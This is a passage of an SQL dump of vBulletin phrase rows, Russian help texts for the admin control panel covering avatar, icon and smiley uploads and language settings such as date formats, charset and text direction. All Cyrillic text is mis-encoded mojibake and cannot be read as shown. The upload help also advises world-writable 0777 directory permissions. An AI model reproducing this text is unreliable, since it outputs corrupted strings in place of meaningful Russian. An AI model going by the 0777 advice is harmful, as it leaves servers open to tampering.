êÃîïêè \"Ñîõðà Ãèòü ïîðÿäîê îòîáðà æåÃèÿ\". \r\n\r\nÑïðà âà âû ìîæåòå îáÃà ðóæèòü Ãåñêîëüêî îïöèé äëÿ êà æäîé êà òåãîðèè èçîáðà æåÃèé. Ññûëêà [Ìà ññîâîå ïåðåìåùåÃèå] ïåðåà äðåñóåò âà ñ Ãà ñòðà Ãèöó, ãäå âû ñìîæåòå âûáðà òü Ãîâóþ êà òåãîðèþ äëÿ êà æäîãî èçîáðà æåÃèÿ è ñîõðà Ãèòü èçìåÃÃ¥Ãèÿ îäÃèì Ãà æà òèåì. \r\n\r\nÑñûëêà [Ãðîñìîòð] îçÃà ÷à åò òîæå ñà ìîå, ÷òî è Ãà æà òèå Ãà Ãà çâà Ãèå êà òåãîðèè ñëåâà , ò.Ã¥. ïåðåà äðåñóåò âà ñ Ãà ñòðà Ãèöó, ãäå âû ñìîæåòå óâèäåòü âñå èçîáðà æåÃèÿ, ïðèÃà äëåæà ùèå ýòîé êà òåãîðèè. \r\n\r\nÑñûëêà [Ãåäà êòèðîâà òü] ïîçâîëÿåò âà ì ðåäà êòèðîâà òü Ãà çâà Ãèå è ïîðÿäîê îòîáðà æåÃèÿ ñîîòâåòñòâóþùåé êà òåãîðèè. \r\n\r\nÑñûëêà [Óäà ëèòü] ïåðåà äðåñóåò âà ñ Ãà ñòðà Ãèöó, ãäå âû ñìîæåòå óäà ëèòü ñîîòâåòñòâóþùóþ êà òåãîðèþ ñ óäà ëåÃèåì ïðèÃà äëåæà ùèõ åé èçîáðà æåÃèé èëè ìà ññîâûì ïåðåìåùåÃèåì èõ â äðóãèå êà òåãîðèè. \r\n\r\nÑñûëêà [Ãðà âà ] ïåðåà äðåñóåò âà ñ Ãà ñòðà Ãèöó, ãäå âû ìîæåòå çà ïðåòèòü ïðà âî èñïîëüçîâà Ãèÿ èçîáðà æåÃèé îïðåäåëåÃÃîé êà òåãîðèè äëÿ îïðåäåëåÃÃûõ ãðóïï ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(22559, -1, 'image_modify_title', 'cphelptext', 'Óïðà âëåÃèå à âà òà ðà ìè/èêîÃêà ìè ñîîáùåÃèé/ñìà éëà ìè', 'vbulletin', '', 0, ''),
(22560, -1, 'image_remove_text', 'cphelptext', 'Ãòî çà ïðîñ Ãà ïîäòâåðæäåÃèå òîãî, ÷òî âû æåëà åòå óäà ëèòü ýòî èçîáðà æåÃèå. Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ. Âîññòà ÃîâëåÃèå ïîñëå óäà ëåÃèÿ ÃåâîçìîæÃî.', 'vbulletin', '', 0, ''),
(22561, -1, 'image_remove_title', 'cphelptext', 'Óäà ëåÃèå à âà òà ðà /èêîÃêè ñîîáùåÃèé/ñìà éëà ', 'vbulletin', '', 0, ''),
(22562, -1, 'image_removecategory_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïðåäîñòà âëÿåò îïöèè äëÿ óäà ëåÃèÿ êà òåãîðèè. Âû ìîæåòå âûáðà òü óäà ëÿòü âñå èçîáðà æåÃèÿ â ýòîé êà òåãîðèè èëè Ãåò. À òà êæå, ïðè âûáîðå âòîðîãî âà ðèà Ãòà , âû ìîæåòå âûáðà òü êà òåãîðèþ, â êîòîðóþ áóäóò ïåðåìåùåÃû âñå èçîáðà æåÃèÿ èç óäà ëÿåìîé âà ìè.', 'vbulletin', '', 0, ''),
(22563, -1, 'image_removecategory_title', 'cphelptext', 'Óäà ëåÃèå êà òåãîðèè à âà òà ðîâ/èêîÃîê ñîîáùåÃèé/ñìà éëîâ', 'vbulletin', '', 0, ''),
(22564, -1, 'image_upload_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå çà ãðóçèòü îäÃî èçîáðà æåÃèå çà ðà ç ÷åðåç âà ø îáîçðåâà òåëü, äëÿ èñïîëüçîâà Ãèÿ Ãà ôîðóìå. ×òîáû ýòî ñäåëà òü, âà øè ñåðâåð è PHP äîëæÃû èìåòü äîñòóï Ãà çà ïèñü. Åñëè äîñòóïà ÃÃ¥ áóäåò, òî çà ãðóçèòü èçîáðà æåÃèå ÃÃ¥ óäà ñòñÿ. Äèðåêòîðèÿ, â êîòîðóþ âû æåëà åòå ñîõðà Ãèòü èçîáðà æåÃèå, äîëæÃà èìåòü CHMOD 777 (èçó÷èòå äîêóìåÃòà öèþ ïî âà øåìó FTP-ìåÃåäæåðó, ÷òîáû óçÃà òü êà ê ýòî ñäåëà òü).', 'vbulletin', '', 0, ''),
(22565, -1, 'image_upload_title', 'cphelptext', 'Çà ãðóçêà à âà òà ðà /èêîÃêè ñîîáùåÃèé/ñìà éëà ', 'vbulletin', '', 0, ''),
(22566, -1, 'image_upload_imagespath_text', 'cphelptext', 'Ãòî ïóòü ê äèðåêòîðèè, â êîòîðóþ áóäóò çà ãðóæåÃû ñìà éëû è èç êîòîðîé îÃè áóäóò îòîáðà æà òüñÿ. Ãòîò ïóòü äîëæåà áûòü äîñòóïåà êà ê äëÿ ÷òåÃèÿ, òà ê È äëÿ çà ïèñè, âà øèì ñåðâåðîì (îáû÷Ãî chmod 0777), ÷òîáû ñìà éëû ìîãëè áûòü çà ãðóæåÃû, è îòîáðà æåÃû ïîëüçîâà òåëÿì.', 'vbulletin', 'zCarot', 1220959514, '3.8.0 Alpha 1'),
(22567, -1, 'image_upload_imagespath_title', 'cphelptext', 'Äèðåêòîðèÿ ôà éëà ñìà éëà ', 'vbulletin', 'zCarot', 1220959514, '3.8.0 Alpha 1'),
(22568, -1, 'image_upload_upload_text', 'cphelptext', 'Çäåñü âû ìîæåòå âûáðà òü êà êîé ôà éë çà ãðóæà òü.', 'vbulletin', 'zCarot', 1220959448, '3.8.0 Alpha 1'),
(22569, -1, 'image_upload_upload_title', 'cphelptext', 'Èìÿ ôà éëà ', 'vbulletin', 'zCarot', 1220959448, '3.8.0 Alpha 1'),
(22570, -1, 'image_upload_imagefile_text', 'cphelptext', 'Çäåñü âû âûáåðèòå ôà éë, Ãà õîäÿùèéñÿ Ãà âà øåì êîìïüþòåðå, ÷òîáû åãî çà ãðóçèòü.', 'vbulletin', '', 0, ''),
(22571, -1, 'image_upload_imagefile_title', 'cphelptext', 'Ôà éë èçîáðà æåÃèÿ', 'vbulletin', '', 0, ''),
(22572, -1, 'image_viewimages_text', 'cphelptext', 'Ãèæå Ãà õîäèòñÿ ãà ëåðåÿ èçîáðà æåÃèé èç âûáðà ÃÃîé êà òåãîðèè. Åñëè â ãà ëåðåå èçîáðà æåÃèé áîëüøå, ÷åì ðà çðåøåÃî îòîáðà æà òüñÿ Ãà ñòðà Ãèöå (ýòîò ïà ðà ìåòð Ãà ñòðà èâà åòñÿ âÃèçó ñòðà Ãèöû), òî âû óâèäèòå ññûëêè Ãà äðóãèå ñòðà Ãèöû, âÃèçó ýòîé. Âû ìîæåòå Ãà æèìà òü Ãà ññûëêè Ãà ñòðà Ãèöû, ÷òîáû óâèäåòü îñòà ëüÃûå èçîáðà æåÃèÿ â ýòîé ãà ëåðåå. \r\n\r\nÂÃèçó ñòðà Ãèöû âû ìîæåòå îáÃà ðóæèòü äâå ññûëêè. Ãà æà â Ãà ññûëêó [Äîáà âèòü] âû ñìîæåòå äîáà âèòü Ãîâóþ èçîáðà æåÃèå Ãà âà ø ôîðóì. Ãà æà â Ãà ññûëêó [Ãåäà êòèðîâà Ãèå êà òåãîðèé] âû âîçâðà òèòåñü Ãà ñòðà Ãèöó óïðà âëåÃèÿ èçîáðà æåÃèÿìè. \r\n\r\nÃðîñìîòð èçîáðà æåÃèé: \r\nÅñëè âû ïðîñìà òðèâà åòå èçîáðà æåÃèÿ â ãà ëåðåå, òî ïîä êà æäîé èç Ãèõ âû ñìîæåòå îáÃà ðóæèòü îïöèè, ñâÿçà ÃÃûå ñ Ãèìè. Ãà æà â Ãà êÃîïêó [Ãåäà êòèðîâà òü], âû ñìîæåòå èçìåÃèòü ïà ðà ìåòðû ñîîòâåòñòâóþùåãî èçîáðà æåÃèÿ. Ãà æà â Ãà ññûëêó [Óäà ëèòü], âû ñìîæåòå óäà ëèòü ñîîòâåòñòâóþùåå èçîáðà æåÃèå. \r\n\r\n×èñëà ïîä êà æäûì èçîáðà æåÃèåì îçÃà ÷à þò ïîðÿäîê îòîáðà æåÃèÿ. Ãîðÿäîê îòîáðà æåÃèÿ èñïîëüçóåòñÿ äëÿ ñîðòèðîâêè ñïèñêà èçîáðà æåÃèé êà ê â óïðà âëåÃèè èçîáðà æåÃèÿìè, òà ê è Ãà ôîðóìå. Âû ìîæåòå èçìåÃèòü ïîðÿäîê îòîáðà æåÃèÿ Ãà ýòîé ñòðà Ãèöå, èçìåÃèâ ÷èñëà è Ãà æà â êÃîïêó \"Ñîõðà Ãèòü ïîðÿäîê îòîáðà æåÃèÿ\" âÃèçó. \r\n\r\nÌà ññîâîå ïåðåìåùåÃèå èçîáðà æåÃèé: \r\nÅñëè âû ìà ññîâî ïåðåìåùà åòå èçîáðà æåÃèÿ, òî êà æäîå èçîáðà æåÃèå â ãà ëåðåå Ãèæå áóäåò èìåòü ïîä ñîáîé ìåÃþ. Âûáåðèòå êà òåãîðèþ èç ýòîãî ìåÃþ. Êîãäà âû Ãà æìåòå êÃîïêó \"Ìà ññîâîå ïåðåìåùåÃèå\", èçîáðà æåÃèÿ áóäóò ïåðåìåùåÃû â óêà çà ÃÃûå êà òåãîðèè. \r\n\r\nÎñòà âüòå ïóñòóþ ñòðîêó â ýòîì ìåÃþ, åñëè âû ÃÃ¥ æåëà åòå ïåðåìåùà òü èçîáðà æåÃèå. Åñëè âû æåëà åòå ïåðåìåñòèòü âñå èçîáðà æåÃèÿ Ãà ýòîé ñòðà Ãèöå â îäÃó è òó æå êà òåãîðèþ, òî âû ìîæåòå âûáðà òü å¸ â ìåÃþ â ñà ìîì Ãèçó ñòðà Ãèöû, ïîñëå ÷åãî âñå îñòà ëüÃûå ìåÃþ ïðèìóò ýòî çÃà ÷åÃèå äëÿ êà òåãîðèè.', 'vbulletin', '', 0, ''),
(22573, -1, 'image_viewimages_title', 'cphelptext', 'Ãðîñìîòð à âà òà ðîâ/èêîÃîê ñîîáùåÃèé/ñìà éëîâ', 'vbulletin', '', 0, ''),
(22574, -1, 'index_home_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ïðîñìîòðåòü Ãåêîòîðóþ ñòà òèñòèêó ïî âà øåìó ôîðóìó è ñåðâåðó, à òà êæå èñïîëüçîâà òü îïöèè áûñòðîãî à äìèÃèñòðèðîâà Ãèÿ, êîòîðûå âêëþ÷à þò: áûñòðûé ïîèñê ïîëüçîâà òåëåé, ïîèñê ôóÃêöèé PHP, ïîèñê ÿçûêà MySQL è ïîëåçÃûå ññûëêè. ÂÃèçó ñòðà Ãèöû, âîçìîæÃî, åñòü ñïèñîê à âòîðîâ ñêðèïòà ôîðóìà . \r\n\r\nÅñëè ó âà ñ åñòü ïðà âà âûïîëÃÃ¥Ãèÿ çà ïðîñîâ ñåðâåðó, òî âû, âîçìîæÃî, ñìîæåòå óâèäåòü ñðåäÃþþ çà ãðóçêó ñåðâåðà ïîä ðà çäåëîì \"Ãûñòðûå ññûëêè à äìèÃèñòðà òîðà \" Ãà ýòîé ñòðà Ãèöå. \r\n\r\nÃûñòðûé ïîèñê ïîëüçîâà òåëåé ïîçâîëÿåò âà ì áûñòðî Ãà éòè ïîëüçîâà òåëåé Ãà îñÃîâå ïîëÃîãî èëè ÷à ñòè÷Ãîãî ñîîòâåòñòâèÿ ñòðîêè è èìåÃè ïîëüçîâà òåëÿ. \r\n\r\nÃîèñê ôóÃêöèé PHP ïðîèçâîäèò ïîèñê ôóÃêöèé Ãà ñà éòå PHP ïî ââåäåÃÃîé ñòðîêå. Ãåçóëüòà òû áóäóò îòîáðà æåÃû âî ôðåéìå. \r\n\r\nÃîèñê ÿçûêà MySQL ïðîèçâîäèò ïîèñê ïî äîêóìåÃòà öèè Ãà ñà éòå MySQL ïî ââåäåÃÃîé ñòðîêå. Ãåçóëüòà òû áóäóò îòîáðà æåÃû âî ôðåéìå. \r\n\r\nÌåÃþ \"ÃîëåçÃûå ññûëêè\" ñîäåðæèò Ãåñêîëüêî ïîëåçÃûõ ññûëîê ïî ôîðóìó, PHP è MySQL, êîòîðûå áóäóò îòêðûâà òüñÿ â Ãîâîì îêÃÃ¥, ïðè âûáîðå èõ â ìåÃþ.', 'vbulletin', '', 0, ''),
(22575, -1, 'index_home_title', 'cphelptext', 'Ãëà âÃà ÿ ñòðà Ãèöà ïà Ãåëè', 'vbulletin', '', 0, ''),
(22576, -1, 'language_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nßçûêè \r\nÔðà çû \r\n\r\nßçûêè: \r\nÑèñòåìà ÿçûêîâ ôîðóìà ïîçâîëÿåò âà ì ïåðåâîäèòü âà ø ôîðóì Ãà äðóãèå ÿçûêè áåç ðåäà êòèðîâà Ãèÿ øà áëîÃîâ è/èëè äðóãèõ ôà éëîâ. Ãòî âîçìîæÃî áëà ãîäà ðÿ ñèñòåìå ôðà ç (ñì. ññûëêó \"Ôðà çû\" âûøå), êîòîðà ÿ ñäåëà ëà øà áëîÃû ôîðóìà Ãåçà âèñèìûìè îò ÿçûêà .  êîÃå÷Ãîì ñ÷¸òå, âû ìîæåòå èñïîëüçîâà òü ìÃîæåñòâî ÿçûêîâ ïðè îäÃîì ñòèëå. \r\n\r\nÊà æäà ÿ ôðà çà ìîæåò áûòü ïåðåâåäåÃà Ãà ëþáîé ÿçûê â óïðà âëåÃèè ÿçûêà ìè. Êîãäà çà ãðóæà åòñÿ ñòðà Ãèöà ôîðóìà , ôîðóì ïðîâåðÿåò êà êîé ÿçûê âûáðà ë ïîëüçîâà òåëü è ïîäñòà âëÿåò ñîîòâåòñòâóþùèå ïåðåìåÃÃûå ôðà ç â ìåñòà , òðåáóþùèå ïåðåâîäà . \r\n\r\n äîáà âëåÃèè ê ïåðåâîäó ôðà ç, ñèñòåìà ÿçûêîâ ôîðóìà ïîääåðæèâà åò ïåðåâîä èçîáðà æåÃèé (ñ ïîìîùüþ ðà çðåøåÃèÿ çà ìåÃû Ãà ñòðîéêè ïà ïêè ñ èçîáðà æåÃèÿìè ñòèëÿ), è ëîêà ëüÃûå ôîðìà òû äà òû/âðåìåÃè/÷èñåë.', 'vbulletin', 'zCarot', 1205941303, '3.7.0 Release Candidate 1'),
(22577, -1, 'language_title', 'cphelptext', 'Î ÿçûêà õ', 'vbulletin', '', 0, ''),
(22578, -1, 'language_add_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå äîáà âèòü Ãîâûé ÿçûê. Çäåñü æå âû ñìîæåòå ïåðåâåñòè âñå ôðà çû Ãà ÃóæÃûé ÿçûê ñ òîãî, êîòîðûé áûë îñÃîâÃûì â âà øåé âåðñèè ôîðóìà .', 'vbulletin', '', 0, ''),
(22579, -1, 'language_add_title', 'cphelptext', 'Ñîçäà Ãèå Ãîâîãî ÿçûêà ', 'vbulletin', '', 0, ''),
(22580, -1, 'language_add_edit_settings_title_text', 'cphelptext', 'Ãòî èìÿ ÿçûêà , îòîáðà æà åìîå â çîÃÃ¥ à äìèÃèñòðèðîâà Ãèÿ è äëÿ ïîëüçîâà òåëåé ôîðóìà .', 'vbulletin', '', 0, ''),
(22581, -1, 'language_add_edit_settings_title_title', 'cphelptext', 'Ãà çâà Ãèå ÿçûêà ', 'vbulletin', '', 0, ''),
(22582, -1, 'language_add_edit_settings_userselect_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò âûáðà òü ýòîò ÿçûê (îà ÃÃ¥ áóäåò îòîáðà æà òüñÿ). Ãòî ïîëåçÃî â òîì ñëó÷à å, åñëè âû åù¸ ÃÃ¥ ïîëÃîñòüþ ïåðåâåëè ÿçûê.', 'vbulletin', '', 0, ''),
(22583, -1, 'language_add_edit_settings_userselect_title', 'cphelptext', 'Ãà çðåøèòü âûáîð ïîëüçîâà òåëÿì', 'vbulletin', '', 0, ''),
(22584, -1, 'language_add_edit_settings_direction_text', 'cphelptext', 'Ãòîò ÿçûê ÷èòà åòñÿ ñëåâà Ãà ïðà âî èëè ñïðà âà Ãà ëåâî?', 'vbulletin', '', 0, ''),
(22585, -1, 'language_add_edit_settings_direction_title', 'cphelptext', 'Ãà ïðà âëåÃèå òåêñòà ', 'vbulletin', '', 0, ''),
(22586, -1, 'language_add_edit_settings_languagecode_text', 'cphelptext', 'Ãòî ñòà Ãäà ðòÃûé êîä äëÿ êà æäîãî ÿçûêà . Ñì. çäåñü ñïèñîê âñåõ êîäîâ ÿçûêà .', 'vbulletin', 'zCarot', 1160697943, '3.6.3'),
(22587, -1, 'language_add_edit_settings_languagecode_title', 'cphelptext', 'Êîä ÿçûêà ', 'vbulletin', '', 0, ''),
(22588, -1, 'language_add_edit_settings_charset_text', 'cphelptext', 'Çäåñü óêà çûâà åòñÿ çÃà ÷åÃèå ïà ðà ìåòðà \'charset\' äëÿ Ãà ñòðîéêè òèïà ñîäåðæèìîãî HTML â øà áëîÃÃ¥ \'headinclude\'. Êà æäûé ÿçûê òðåáóåò ñïåöèôè÷åñêèõ êîäèðîâîê äëÿ ïîääåðæêè ðà çëè÷Ãûõ ñèìâîëîâ, èñïîëüçóåìûõ â ÿçûêå. \r\nÅñëè âû óñòà Ãîâèòå çäåñü windows-1251, òî êîäèðîâêà áóäåò óêà çà Ãà êà ê: <meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\" /> ', 'vbulletin', '', 0, ''),
(22589, -1, 'language_add_edit_settings_charset_title', 'cphelptext', 'Óñòà Ãîâêà êîäèðîâêè HTML', 'vbulletin', '', 0, ''),
(22590, -1, 'language_add_edit_settings_imagesoverride_text', 'cphelptext', 'Ãåêîòîðûå èçîáðà æåÃèÿ ôîðóìà ñîäåðæà ò â ñåáå òåêñò Ãà îïðåäåëåÃÃîì ÿçûêå. Ãòà îïöèÿ ïîçâîëÿåò âà ì èñïîëüçîâà òü èçîáðà æåÃèÿ, ñäåëà ÃÃûå äëÿ äðóãèõ ÿçûêîâ. Ãòè èçîáðà æåÃèÿ ñîäåðæà òüñÿ â ïà ïêå èçîáðà æåÃèé êÃîïîê, ïî óìîë÷à Ãèþ ýòî images/buttons. \r\n\r\nÂû ìîæåòå èñïîëüçîâà òü <#> äëÿ ïðåäîñòà âëåÃèÿ ID ñòèëÿ, èñïîëüçóåìîãî ïîëüçîâà òåëåì. Ãòî ïîçâîëÿåò âà ì ïîääåðæèâà òü ðà çëè÷Ãûå ñòèëè äëÿ ýòîãî ÿçûêà . Ãà ïðèìåð, âû ìîæåòå Ãà çâà òü ïà ïêó ñ èçîáðà æåÃèÿìè images_èìÿ ÿçûêà _ID ñòèëÿ è óñòà Ãîâèòü ýòîò ïà ðà ìåòð Ãà images_èìÿ ÿçûêà _<#> ', 'vbulletin', 'zCarot', 1216115012, '3.8.0 Alpha 1'),
(22591, -1, 'language_add_edit_settings_imagesoverride_title', 'cphelptext', 'ÃåðåÃà çÃà ÷åÃèå äèðåêòîðèè êÃîïîê', 'vbulletin', 'zCarot', 1216115012, '3.8.0 Alpha 1'),
(22592, -1, 'language_add_edit_settings_locale_text', 'cphelptext', 'Âû ìîæåòå îïðåäåëèòü ëîêà ëüÃûå äà ÃÃûå èëè ïðîñòî óêà çà òü èõ â Ãà ñòðîéêà õ Ãèæå. Òà ê êà ê ëîêà ëüÃûå äà ÃÃûå ïîääåðæèâà þòñÿ ÃÃ¥ âî âñåõ ÎÑ, òî ðåêîìåÃäóåòñÿ óêà çà òü èõ âðó÷Ãóþ.', 'vbulletin', 'zCarot', 1177625980, '3.6.6'),
(22593, -1, 'language_add_edit_settings_locale_title', 'cphelptext', 'Ëîêà ëüÃûå äà ÃÃûå', 'vbulletin', '', 0, ''),
(22594, -1, 'language_add_edit_settings_dateoverride_text', 'cphelptext', 'Ãòà Ãà ñòðîéêà çà ìåÃèò ôîðìà ò äà òû, óêà çà ÃÃûé â îñÃîâÃûõ Ãà ñòðîéêà õ (çäåñü ). Ãðîïóñòèòå ïóÃêò, ÷òîáû èñïîëüçîâà òü ôîðìà ò èç îïöèé ôîðóìà . \r\n\r\nÈçó÷èòå ýòó ñòðà Ãèöó , ÷òîáû óçÃà òü ñïèñîê ïåðåìåÃÃûõ âðåìåÃè. Âû ìîæåòå èñïîëüçîâà òü ýòè ïåðåìåÃÃûå âìåñòå ñ äðóãèìè ñèìâîëà ìè äëÿ çà äà Ãèÿ ôîðìà òà . \r\n\r\nÅâðîïåéñêèé ôîðìà ò (Ãà ïð., 25-04-98): %d-%m-%y \r\n\r\nÅñëè âû óêà çà ëè ëîêà ëüÃûå Ãà ñòðîéêè äëÿ ýòîãî ÿçûêà , òî âû ìîæåòå èñïîëüçîâà òü %x, ÷òîáû èñïîëüçîâà òü ôîðìà ò ëîêà ëüÃîãî ÿçûêà .', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(22595, -1, 'language_add_edit_settings_dateoverride_title', 'cphelptext', 'Çà ìåÃà ôîðìà òà äà òû', 'vbulletin', '', 0, ''),
(22596, -1, 'language_add_edit_settings_timeoverride_text', 'cphelptext', 'Ãòà Ãà ñòðîéêà çà ìåÃèò ôîðìà ò âðåìåÃè, óêà çà ÃÃûé â ÎñÃîâÃûõ Ãà ñòðîéêà õ (çäåñü ). Ãðîïóñòèòå ïóÃêò, ÷òîáû èñïîëüçîâà òü ôîðìà ò èç îïöèé ôîðóìà . \r\n\r\nÈçó÷èòå ýòó ñòðà Ãèöó , ÷òîáû óçÃà òü ñïèñîê ïåðåìåÃÃûõ âðåìåÃè. Âû ìîæåòå èñïîëüçîâà òü ýòè ïåðåìåÃÃûå âìåñòå ñ äðóãèìè ñèìâîëà ìè äëÿ çà äà Ãèÿ ôîðìà òà . \r\n\r\nÃðèìåðû:\r\nAM/PM ôîðìà ò (Ãà ïð., 11:15 PM): %I:%M %p \r\n24-õ ÷à ñîâîé ôîðìà ò (Ãà ïð., 23:15): %H:%M \r\n\r\nÅñëè âû óêà çà ëè ëîêà ëüÃûå Ãà ñòðîéêè äëÿ ýòîãî ÿçûêà , òî âû ìîæåòå èñïîëüçîâà òü %x, ÷òîáû èñïîëüçîâà òü ôîðìà ò ëîêà ëüÃîãî ÿçûêà .', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(22597, -1, 'language_add_edit_settings_timeoverride_title', 'cphelptext', 'Çà ìåÃà ôîðìà òà âðåìåÃè', 'vbulletin', '', 0, ''),
(22598, -1, 'language_add_edit_settings_registereddateoverride_text', 'cphelptext', 'Ãòà Ãà ñòðîéêà çà ìåÃèò ôîðìà ò äà òû ðåãèñòðà öèè, óêà çà ÃÃûé â îñÃîâÃûõ Ãà ñòðîéêà õ (çäåñü ). Ãðîïóñòèòå ïóÃêò, ÷òîáû èñïîëüçîâà òü ôîðìà ò èç îïöèé ôîðóìà . \r\n\r\nÈçó÷èòå ýòó ñòðà Ãèöó , ÷òîáû óçÃà òü ñïèñîê ïåðåìåÃÃûõ âðåìåÃè. Âû ìîæåòå èñïîëüçîâà òü ýòè ïåðåìåÃÃûå âìåñòå ñ äðóãèìè ñèìâîëà ìè äëÿ çà äà Ãèÿ ôîðìà òà . Ñì. ïà ðà ìåòðû \"Çà ìåÃà ôîðìà òà äà òû\" è \"Çà ìåÃà ôîðìà òà âðåìåÃè\" âûøå, ÷òîáû óâèäåòü ïðèìåðû.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(22599, -1, 'language_add_edit_settings_registereddateoverride_title', 'cphelptext', 'Çà ìåÃà ôîðìà òà äà òû ðåãèñòðà öèè', 'vbulletin', '', 0, ''),
(22600, -1, 'language_add_edit_settings_calformat1override_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð çà ìåÃèò ôîðìà ò äÃÿ ðîæäåÃèÿ ñ ãîäîì , êîòîðûé óêà çà à â âà øèõ îñÃîâÃûõ Ãà ñòðîéêà õ (çäåñü ). Ãðîïóñòèòå ïóÃêò, ÷òîáû èñïîëüçîâà òü ôîðìà ò èç îïöèé ôîðóìà . \r\n\r\nÈçó÷èòå ýòó ñòðà Ãèöó , ÷òîáû óçÃà òü ñïèñîê ïåðåìåÃÃûõ âðåìåÃè. Âû ìîæåòå èñïîëüçîâà òü ýòè ïåðåìåÃÃûå âìåñòå ñ äðóãèìè ñèìâîëà ìè äëÿ çà äà Ãèÿ ôîðìà òà . Ñì. ïà ðà ìåòðû \"Çà ìåÃà ôîðìà òà äà òû\" è \"Çà ìåÃà ôîðìà òà âðåìåÃè\" âûøå, ÷òîáû óâèäåòü ïðèìåðû.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(22601, -1, 'language_add_edit_settings_calformat1override_title', 'cphelptext', 'Çà ìåÃà ôîðìà òà äÃåé ðîæäåÃèé', 'vbulletin', '', 0, ''),
(22602, -1, 'language_add_edit_settings_calformat2override_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð çà ìåÃèò ôîðìà ò äÃÿ ðîæäåÃèÿ áåç ãîäà , êîòîðûé óêà çà à â âà øèõ îñÃîâÃûõ Ãà ñòðîéêà õ (çäåñü ). Ãðîïóñòèòå ïóÃêò, ÷òîáû èñïîëüçîâà òü ôîðìà ò èç îïöèé ôîðóìà . \r\n\r\nÈçó÷èòå ýòó ñòðà Ãèöó , ÷òîáû óçÃà òü ñïèñîê ïåðåìåÃÃûõ âðåìåÃè. Âû ìîæåòå èñïîëüçîâà òü ýòè ïåðåìåÃÃûå âìåñòå ñ äðóãèìè ñèìâîëà ìè äëÿ çà äà Ãèÿ ôîðìà òà . Ñì. ïà ðà ìåòðû \"Çà ìåÃà ôîðìà òà äà òû\" è \"Çà ìåÃà ôîðìà òà âðåìåÃè\" âûøå, ÷òîáû óâèäåòü ïðèìåðû.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(22603, -1, 'language_add_edit_settings_calformat2override_title', 'cphelptext', 'Çà ìåÃà ôîðìà òà äÃåé ðîæäåÃèé', 'vbulletin', '', 0, ''),
(22604, -1, 'language_add_edit_settings_logdateoverride_text', 'cphelptext', 'Ãòà Ãà ñòðîéêà çà ìåÃèò ôîðìà ò äà òû çà ïèñåé äåéñòâèé, óêà çà ÃÃûé â îñÃîâÃûõ Ãà ñòðîéêà õ (çäåñü ). Ãðîïóñòèòå ïóÃêò, ÷òîáû èñïîëüçîâà òü ôîðìà ò èç îïöèé ôîðóìà . \r\n\r\nÈçó÷èòå ýòó ñòðà Ãèöó , ÷òîáû óçÃà òü ñïèñîê ïåðåìåÃÃûõ âðåìåÃè. Âû ìîæåòå èñïîëüçîâà òü ýòè ïåðåìåÃÃûå âìåñòå ñ äðóãèìè ñèìâîëà ìè äëÿ çà äà Ãèÿ ôîðìà òà . Ñì. ïà ðà ìåòðû \"Çà ìåÃà ôîðìà òà äà òû\" è \"Çà ìåÃà ôîðìà òà âðåìåÃè\" âûøå, ÷òîáû óâèäåòü ïðèìåðû.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(22605, -1, 'language_add_edit_settings_logdateoverride_title', 'cphelptext', 'Çà ìåÃà ôîðìà òà çà ïèñåé', 'vbulletin', '', 0, ''),
(22606, -1, 'language_add_edit_settings_decimalsep_text', 'cphelptext', 'Èñïîëüçóéòå ýòîò ïà ðà ìåòð äëÿ èçìåÃÃ¥Ãèÿ îòîáðà æåÃèÿ äåñÿòè÷Ãûõ ÷èñåë ñ ïëà âà þùåé òî÷êîé äëÿ ýòîãî ÿçûêà .', 'vbulletin', '', 0, ''),
(22607, -1, 'language_add_edit_settings_decimalsep_title', 'cphelptext', 'Äåñÿòè÷Ãûé ðà çäåëèòåëü', 'vbulletin', '', 0, ''),
(22608, -1, 'language_add_edit_settings_thousandsep_text', 'cphelptext', 'Èñïîëüçóéòå ýòîò ïà ðà ìåòð äëÿ èçìåÃÃ¥Ãèÿ îòîáðà æåÃèÿ áîëüøèõ ÷èñåë äëÿ ýòîãî ÿçûêà .', 'vbulletin', '', 0, ''),
(22609, -1, 'language_add_edit_settings_thousandsep_title', 'cphelptext', 'Ãà çäåëèòåëü òûñÿ÷', 'vbulletin', '', 0, ''),
(22610, -1, 'language_add_edit_settings_dirmark_text', 'cphelptext', 'Êîãäà ñèìâîëû Ñïðà âà -Ãà ëåâî è Ñëåâà -Ãà ïðà âî ïåðåìåøà Ãû Ãà îäÃîé ñòðà Ãèöå, îÃè ìîãóò Ãà êëà äûâà òüñÿ äðóã Ãà äðóãà . Ãòà îïöèÿ äîáà âëÿåò ñêðûòûå Ãà ïðà âëÿþùèå ïîìåòêè â ðà çëè÷Ãûå ìåñòà , ãäå ìîæåò áûòü ýòà ïðîáëåìà . Ãðîáëåìà îáû÷Ãî âîçÃèêà åò, êîãäà èìåÃà ïîëüçîâà òåëåé èäóò <- è Ãà çâà Ãèÿ òåì èäóò -> (è Ãà îáîðîò). Åñëè âû ÃÃ¥ îæèäà åòå òà êèõ ïðîáëåì, òî îñòà âüòå ýòó îïöèþ âûêëþ÷åÃÃîé.', 'vbulletin', 'zCarot', 1220867181, '3.8.0 Alpha 1'),
(22611, -1, 'language_add_edit_settings_dirmark_title', 'cphelptext', 'Ãà ïðà âëÿþùèå ïîìåòêè', 'vbulletin', '', 0, ''),
